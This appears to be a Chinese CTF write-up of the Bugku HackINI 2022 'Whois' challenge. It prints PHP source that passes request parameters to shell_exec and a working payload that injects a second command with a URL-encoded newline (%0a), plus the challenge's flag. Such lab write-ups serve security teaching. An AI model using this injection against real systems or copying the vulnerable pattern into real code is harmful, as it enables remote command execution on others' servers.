Bugku HackINI 2022 Whois 详解

目录

前置知识

解题过程

总结


前置知识

网络安全-绕过技巧(WAF、白名单、黑名单)总结-CSDN博客

解题过程

打开靶场

类似请求查询外网某个服务的一个界面,第一时间想到SSRF,后续抓包也看到了host和query的参数,但是尝试发现SSRF并不行

ctrl+U 查看源码可以发现 query.php,访问得到

复制代码
<?php

error_reporting(0);

$output = null;
$host_regex = "/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/";
$query_regex = "/^[0-9a-zA-Z\. ]+$/";


if (isset($_GET['query']) && isset($_GET['host']) && 
      is_string($_GET['query']) && is_string($_GET['host'])) {

  $query = $_GET['query'];
  $host = $_GET['host'];
  
  if ( !preg_match($host_regex, $host) || !preg_match($query_regex, $query) ) {
    $output = "Invalid query or whois host";
  } else {
    $output = shell_exec("/usr/bin/whois -h ${host} ${query}");
  }

} 

发现两个参数并没有进行什么过滤,只是确保两个参数是字符串等等,关键点在于

复制代码
$output = shell_exec("/usr/bin/whois -h ${host} ${query}");

很明显目标是利用shell_exec进行RCE

/usr/bin/whois明显是Linux系统,可以用换行符,达到执行两条命令的效果,

这里需要采用URL编码才能正常解析换行符,%0a

下面用ls看下当前目录下文件

复制代码
/query.php?host=whois.verisign-grs.com%0a&query=ls

可以看到有以下文件可疑

复制代码
thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

先尝试直接访问

成功获取flag

复制代码
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

总结

基础的Linux RCE 绕过

相关推荐
七歌杜金房5 小时前
我终于又有了自己的 Linux 电脑
linux·debian·mac
tntxia1 天前
linux curl命令详解_curl详解
linux
扛枪的书生1 天前
Linux 网络管理器用法速查
linux
顺风尿一寸1 天前
Java Socket 内核之旅:从 SocketChannel.read() 到 tcp_recvmsg 与 epoll 的完整调用链路
linux
XIAOHEZIcode2 天前
Ubuntu 终端美化全栈指南:Bash 到 Kitty 踩坑实录
linux·ubuntu·命令行
唐青枫2 天前
别再只会用 cron:Linux systemd Timer 定时任务实战详解
linux
AlfredZhao4 天前
生产环境里,为什么不建议把普通端口直接暴露到公网?
linux·https·443·80
戴为沐5 天前
Linux内存扩容指南
linux
zylyehuo5 天前
Linux 彻底且安全地删除文件
linux
用户805533698036 天前
主线 U-Boot 上 RK3506:和闭源 rkbin 拔河的三个隐性契约
linux·嵌入式